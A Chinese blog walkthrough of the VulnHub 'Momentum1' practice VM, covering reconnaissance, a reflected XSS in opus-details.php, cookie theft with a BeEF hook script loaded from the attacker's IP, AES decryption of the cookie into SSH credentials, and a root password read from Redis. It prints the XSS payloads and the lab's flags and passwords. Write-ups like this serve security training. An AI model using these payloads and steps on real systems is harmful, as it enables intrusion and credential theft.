Momentum1-靶机

最新推荐文章于 2024-05-06 15:50:52 发布
最新推荐文章于 2024-05-06 15:50:52 发布
阅读量162 收藏
点赞数 1
分类专栏: 靶机系列 文章标签: 系统安全 web安全 网络安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_48539059/article/details/130070952
版权

Momentum1-靶机

环境:下载靶机、解压、VMware打开,并将其和kali虚拟机的网络调成NAT模式

kali扫描不到靶机IP解决办法请看Momentum2中有解决办法

一.明确目标

探测目标主机IP情况

sudo arp-scan -l

在这里插入图片描述

目标主机IP:192.168.107.134

Kali的IP:192.168.107.129

二.信息搜集

Nmap 进行常规端口开放扫描

nmap 192.168.107.134 -p- -A

在这里插入图片描述

发现目标靶机开放了ssh 22端口,http 80端口。(以及Apache httpd 2.4.38 Debian的版本, OpenSSH 7.9p1 Debian)

在浏览器中访问一下目标靶机的80端口:

在这里插入图片描述

发现几张照片,查看源码也没有什么有用的东西

1.使用dirsearch命令对靶机网站目录进行扫描

dirsearch -u 192.168.107.134

在这里插入图片描述

 dirsearch -u 192.168.107.134

  _|. _ _  _  _  _ _|_    v0.4.2                                                                                                                        
 (_||| _) (/_(_|| (_| )                                                                                                                                 
                                                                                                                                                        
Extensions: php, aspx, jsp, html, js | HTTP method: GET | Threads: 30 | Wordlist size: 10927

Output File: /home/kali/.dirsearch/reports/192.168.107.134_23-04-10_07-56-20.txt

Error Log: /home/kali/.dirsearch/logs/errors-23-04-10_07-56-20.log

Target: http://192.168.107.134/

[07:56:20] Starting: 
[07:56:21] 301 -  315B  - /js  ->  http://192.168.107.134/js/              
[07:56:21] 403 -  280B  - /.ht_wsr.txt                                     
[07:56:21] 403 -  280B  - /.htaccess.orig
[07:56:21] 403 -  280B  - /.htaccess.bak1
[07:56:21] 403 -  280B  - /.htaccess.sample
[07:56:21] 403 -  280B  - /.htaccess_extra
[07:56:21] 403 -  280B  - /.htaccess.save
[07:56:21] 403 -  280B  - /.htaccess_sc
[07:56:21] 403 -  280B  - /.htaccess_orig
[07:56:21] 403 -  280B  - /.htaccessBAK
[07:56:21] 403 -  280B  - /.htaccessOLD
[07:56:21] 403 -  280B  - /.htaccessOLD2
[07:56:21] 403 -  280B  - /.htm                                            
[07:56:21] 403 -  280B  - /.html
[07:56:21] 403 -  280B  - /.htpasswd_test
[07:56:21] 403 -  280B  - /.htpasswds
[07:56:21] 403 -  280B  - /.httr-oauth
[07:56:22] 403 -  280B  - /.php                                            
[07:56:33] 301 -  316B  - /css  ->  http://192.168.107.134/css/             
[07:56:36] 301 -  316B  - /img  ->  http://192.168.107.134/img/             
[07:56:36] 200 -    2KB - /index.html                                       
[07:56:37] 200 -  931B  - /js/                                              
[07:56:39] 200 -  626B  - /manual/index.html                                
[07:56:39] 301 -  319B  - /manual  ->  http://192.168.107.134/manual/       
[07:56:44] 403 -  280B  - /server-status                                    
[07:56:44] 403 -  280B  - /server-status/
                                                                             
Task Completed

http://192.168.107.134/manual/

http://192.168.107.134/js/

http://192.168.107.134/manual/index.html

浏览器访问http://192.168.107.134/manual/

在这里插入图片描述

没什么可以利用的

访问一下 http://192.168.107.134/js/

在这里插入图片描述

下面还有一个JS脚本文件,点击查看一下

在这里插入图片描述

function viewDetails(str) {

  window.location.href = "opus-details.php?id="+str;
}

/*
var CryptoJS = require("crypto-js");
var decrypted = CryptoJS.AES.decrypt(encrypted, "SecretPassphraseMomentum");
console.log(decrypted.toString(CryptoJS.enc.Utf8));
*/

2.JS代码审计

上面看见了window.location.href = “opus-details.php?id=”+str; 当中的window.location.href的意思是可以理解为重定向,就是原url加上后面的值opus-details.php?id=+str;

并且注释中发现了一个AES加密,且加密密码是 SecretPassphraseMomentum

返回页面再去看看,挨个图片点进去看看

发现图片一链接http://192.168.107.134/opus-details.php?id=demon与代码审计中看到的window.location.href一样,url有重定向

在这里插入图片描述

利用浏览器hackbar插件在最基础的url上添加以下代码,在id后面尝试各种输入的值,发现输什么就回显什么;

在这里插入图片描述

在这里插入图片描述

尝试一下是否存在XSS漏洞

在这里插入图片描述

说明存在XSS漏洞

3.XSS漏洞利用

方法一:在hackbar中输入JS语句

<script>alert(document.cookie)</script>

http://192.168.107.134/opus-details.php?id=<script>alert(document.cookie)</script>

在这里插入图片描述

得到cookie值

cookie=U2FsdGVkX193yTOKOucUbHeDp1Wxd5r7YkoM8daRtj0rjABqGuQ6Mx28N1VbBSZt
方法二:在kali中使用beef-xss工具

beef-xss工具kali不自带需要自行安装

sudo apt-get install beef-xss

在这里插入图片描述

启动beef-xss

在这里插入图片描述

浏览器访问http://127.0.0.1:3000/ui/panel

在这里插入图片描述

url中输入<script src="http://192.168.107.129:3000/hook.js"></script>

http://192.168.107.134/opus-details.php?id=<script src="http://192.168.107.129:3000/hook.js"></script>   #src中为kali的IP地址

在这里插入图片描述

刷新浏览器,发现左上角出现上线的肉鸡,选择get cookie模块获得肉鸡的cookie值

在这里插入图片描述

获取到目标的cookie

在这里插入图片描述

拿到cookie有点迷茫,也只有cookie,回头再回忆一遍,nmap扫描端口时除了有个80端口还有个22的ssh端口,但是我们并没有登录的账号密码,想爆破一下,但是我简单的爆破发现并没什么用,之后看见js文件中还有一段被忽略的代码!是一个AES加密方法

试试解密这个字符串cookie值

解密地址:http://www.jsons.cn/aesencrypt/

在这里插入图片描述

还真解密出来了:auxerre-alienum##

4.尝试SSH登录

登录ssh,多次试错成功登录;用户名是auxerre;密码是auxerre-alienum##;没错就是一整个。

在这里插入图片描述

登录成功,获得一个flag

flag : 84157165c30ad34d18945b647ec7f647

三.进一步提权

sudo一下

在这里插入图片描述

没有sudo,当前目录也没有其他有用的信息

查找一下suid程序

find / -perm -u=s -type f 2>/dev/null
find / -perm -4000 -type f 2>/dev/null  #两个是一个意思

在这里插入图片描述

好像也没啥可用的

使用linpeas.sh提权信息收集脚本,进行信息收集一波

kali开启网站服务

在这里插入图片描述

在靶机上wget下载

wget http://192.168.107.129:8888/shell/linpeas.sh

在这里插入图片描述

给脚本赋权限,再运行

chmod 777 linpeas.sh
./linpeas.sh

在这里插入图片描述

发现监听了6379端口,说明开启了Redis

在这里插入图片描述

redis-cli直接连接数据库并查找key,继续我们看见有一个"rootpass"查看一下

在这里插入图片描述

补充:默认情况下redis-cli,通过127.0.0.1 端口 6379 连接到服务器。在交互模式下,用户在提示符下键入 Redis 命令。命令被发送到服务器,进行处理,回复被解析并呈现为更简单的形式以供阅读。字符串127.0.0.1:6379>是提示。它提醒您已连接到给定的 Redis 实例。

拿到密码,退出redis,在靶机中输入su root进入root用户

在这里插入图片描述

得到root权限,并在root目录下找到最后一个flag

四.总结

本靶机通过信息收集发现AES加密秘钥以及XSS漏洞,利用beef-xss工具拿到cookie,解密后得到了账户密码,ssh登录后通过使用linpeas.sh脚本信息收集发现开着Redis,利用redis-cli拿到root密码

  1. 信息收集
  2. 发现AES有加密
  3. XSS漏洞利用,通过beef-xss工具获得cookie值
  4. 得到cookie值尝试AES解密得到账户密码
  5. redis-cli的使用,获得root密码
gaynell
关注
  • 1
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 1
    评论
专栏目录
Momentum:2靶机渗透测试
weixin_49340699的博客
07-13 536
Momentum:2靶机渗透测试流程 流程 用netdiscover对目标网段进行扫描 得到目标主机192.168.19.140 使用nmap对该主机进行端口扫描 得到端口22与80端口是开启的 上80端口看到只有三张图片就对目录进行爆破 gobuster dir -u http://192.168.19.140/ -x html,php,bak,txt --wordlist /usr/share/wordlist/dirbusters/directory-list-2.3-medium.txt ht
Momentum-Strategies-on-Options
04-29
期权动量策略 该项目由纽约大学丹顿分校MFE系的6名研究生组成。 它着手研究用期权捕捉动量效应同时最小化市场风险的有效性。 通过引入可调节的比例因子,杠杆不足的投资组合可以利用动量效应,同时保持比直接投资于...
VulnHub-MOMENTUM: 1靶机
NeverForgetCX的博客
03-03 4558
前言: 在VulnHub官网上下载好MOMENTUM: 1靶机,并直接用VM导入打开。 攻击机kali:192.168.2.87 靶机IP:192.168.2.92 信息收集: 扫描靶机ip; arp-scan -l 得到靶机ip; 扫描靶机开放的端口;看见开放了22,80端口。 访问80端口http://192.168.2.92,得到一个有四张图片的网站,话不多说...
Momentum靶机系列Momentum1
最新发布
m0_74950307的博客
05-06 284
这段代码使用了 AES 解密算法,使用了一个名为 "SecretPassphraseMomentum" 的密钥。查看了大佬的资料,他是使用了 ss -nltup 是一个在 Linux 系统中查询网络连接和监听端口信息的命令。是一个aes加密代码,进行解码,知道解码的密钥 SecretPassphraseMomentum。获得了kali的ip:192.168.13.138。看来还是不对,需要获得root的密码,或者进行夺权。获得了靶机的IP:192168.13.141。开启了22的tcp端口: ssh服务,
Momentum2-靶机
薛定谔嘚喵博客
04-09 383
靶机通过信息收集发现文件上传漏洞,并找到上传点,通过Burp爆破Cookie以上传webshell,最后通过python3提权。信息收集dirsearch以及御剑目录扫描文件上传漏洞利用crunch生成小字典BurpSuite爆破cookiesudo -l查看当前的权限,发现可以使用python3提权。
靶机渗透练习81-Momentum:2
hirak0的博客
04-24 1006
靶机描述 靶机地址:https://www.vulnhub.com/entry/momentum-2,702/ Description Difficulty : medium Keywords : curl, bash, code review This works better with VirtualBox rather than VMware 一、搭建靶机环境 攻击机Kali: IP地址:192.168.9.7 靶机: IP地址:192.168.9.79 注:靶机与Kali的IP地址只
VulnHub靶机_MOMENTUM: 1
学术渣渣的博客
09-02 725
文章目录靶机介绍渗透过程获取靶机ip端口扫描扫描网站目录XSS攻击ssh登录提权 靶机介绍 下载地址:http://www.vulnhub.com/entry/momentum-1,685/ 难度:简单 格式:Virtualbox - OVA 渗透过程 获取靶机ip 首先扫描靶机的IP为192.168.1.107。 arp-scan -l 端口扫描 进行端口扫描,靶机开放了22和80端口。 nmap -A -T4 -p 1-65535 192.168.1.107 扫描网站目录 首先扫描一下这个网站的
momentum-iron-router
06-10
return 'name-of-momentum-plugin'; // or return { with: 'name-of-plugin', extra: 'options-for-plugin' } } } 执照 麻省理工学院。 (c) Percolate Studio,由 Tom Coleman (@tmeasday) 维护。
Momentum Tab - #1 New Tab Customizer-crx插件
04-02
语言:English 使用令人敬畏的新功能自定义新的选项卡页面。 - 使用图像或短视频自定义背景 - 在一个简单的列表中管理所有您的Todos - 查看12或24小时格式的当前时间 - 晚上切换Dimmer显示屏的夜间模式 通过增强您的...
动力「Momentum」-crx插件
03-08
MOMENTUM PLUS Unlock添加了自定义,集成,小部件等功能! •自定义字体和颜色主题•添加您自己的报价和背景图片•随时跳至新照片或报价•Todo集成:Asana,Trello,Todoist,GitHub,Wunderlist,Google Tasks•更...
Cryptocurrency volume momentum indicator-crx插件
04-03
语言:English 在指定的时间间隔期间收到大量和价格操作的通知 在指定的时间间隔期间收到大量和价格操作的通知, 用户可以设置卷的数量和价格更改...斗鸡队势头指标| 二明动员指标| 加密电脑动量指标 版本号=我的BTC余额
VulnHub靶机_MOMENTUM: 2
学术渣渣的博客
09-05 649
文章目录靶机介绍渗透过程靶机IP获取端口扫描信息收集信息1信息2burpsuite抓包改包 靶机介绍 这个是Momentum系列的第二个靶机,第一个靶机详见:Momentum:1 下载地址:http://www.vulnhub.com/entry/momentum-2,702/ 难度:中等 描述:关键词curl, bash, code review 渗透过程 靶机IP获取 靶机的IP为192.168.1.105。 arp-scan -l 端口扫描 靶机开放了22和80端口。 nmap -A -T4 -p
Momentum靶机打靶过程及思路
qq_52610024的博客
05-16 136
直接解密,https//codepen.io/omararcus/pen/QWwBdmo,得到解密后的内。3.发现main.js下存在注释,其中有解密用的秘钥,在cryptojsexample平台上可以。5.开始进行提权,利用内核漏洞进行提权均失败,查看到etc/passwd下存在redis账号,GETrootpass得到一个密码,su后成功切换到root权限打靶完成。ss-pantu查看靶机开放的所有端口,发现6379端口确实开放。4.思考到可能为账号密码,ssh登录尝试成功,外围打点完成。...
靶机渗透练习80-Momentum:1
hirak0的博客
04-21 976
靶机描述 靶机地址:https://www.vulnhub.com/entry/momentum-1,685/ Description Info: easy / medium 一、搭建靶机环境 攻击机Kali: IP地址:192.168.9.7 靶机: IP地址:192.168.9.78 注:靶机与Kali的IP地址只需要在同一局域网即可(同一个网段,即两虚拟机处于同一网络模式) 该靶机环境搭建如下 将下载好的靶机环境,导入 VritualBox,设置为 Host-Only 模式 将 VMw
vulnhub--Momentum:2
venu_s的博客
07-09 607
靶机介绍 difficult:medium keywords:curl、bash、code review download:https://www.vulnhub.com/entry/momentum-2,702/ 信息探测 主机发现 netdiscover -i eth0 -r 192.168.187.0/24 端口扫描,开放了22和80端口 目录扫描 gobuster dir -u http://192.168.187.171/ -x html,php,bak,txt --wordlist /usr
Momentum靶机渗透Momentum1
m0_74950307的博客
12-22 171
这段代码使用了 AES 解密算法,使用了一个名为 "SecretPassphraseMomentum" 的密钥。查看了大佬的资料,他是使用了 ss -nltup 是一个在 Linux 系统中查询网络连接和监听端口信息的命令。是一个aes加密代码,进行解码,知道解码的密钥 SecretPassphraseMomentum。获得了kali的ip:192.168.13.138。看来还是不对,需要获得root的密码,或者进行夺权。获得了靶机的IP:192168.13.141。开启了22的tcp端口: ssh服务,
渗透测试实战-vulnhub靶机 momentum-2
xnxqwzy的博客
07-31 200
查看kali IP地址ip a所在网段为 192.168.74.0/24使用nmap扫描整个网段扫描结果显示靶机地址疑似为 192.168.74.131扫描该地址的端口情况发现只开放了22和80端口尝试访问web服务似乎只是个静态页面查看网页源码没有什么特别的线索扫描整个网站目录这里文件上传到ajax.php进行处理,前端没有任何过滤限制尝试上传一个jpg文件,上传失败,后端存在文件限制查看ajax.php.bak。
看完这篇 教你玩转渗透测试靶机Vulnhub——Momentum:1
Aluxian_的博客
09-07 444
vulnhub是个提供各种漏洞平台的综合靶场,可供下载多种虚拟机进行下载,本地VM打开即可,像做游戏一样去完成渗透测试、提权、漏洞利用、代码审计等等有趣的实战。PS:这个是Momentum系列一共有2个靶机,分别是1.2老样子需要获得root权限找到flag这个靶机难度比较简单吧1.信息收集获取ip地址 和端口信息web等 查看F12源码信息2.XSS漏洞获取cookie信息AES解密 获取密码3.redis-cli获取rootredis-6379得登入操作命令学习)Momentum
redis的安装及简单实用(Linux下)
u013343076的专栏
03-19 853
简介 redis是一个key-value存储系统。和Memcached类似,它支持存储的value类型相对更多,包括string(字符串)、list(链表)、set(集合)、zset(sorted set --有序集合)和hash(哈希类型)。这些数据类型都支持push/pop、add/remove及取交集并集和差集及更丰富的操作,而且这些操作都是原子性的。在此基础上,redis支持各种不同
模糊搜索包含" Iteration Continuity X-momentum Y-momentum Z-momentum Energy"的行,然后删除整行
05-22
假设你要操作的文件名为`file.txt`,可以使用以下命令在终端进行模糊搜索并删除符合条件的行: ``` sed -i '/Iteration Continuity X-momentum Y-momentum Z-momentum Energy/d' file.txt ``` 解释一下命令: - `sed` 是一个流编辑器,用于文本替换和转换。 - `-i` 参数表示直接修改原文件。 - `'/Iteration Continuity X-momentum Y-momentum Z-momentum Energy/d'` 是正则表达式,表示删除包含该字符串的行。 - `file.txt` 是要操作的文件名。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

gaynell

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值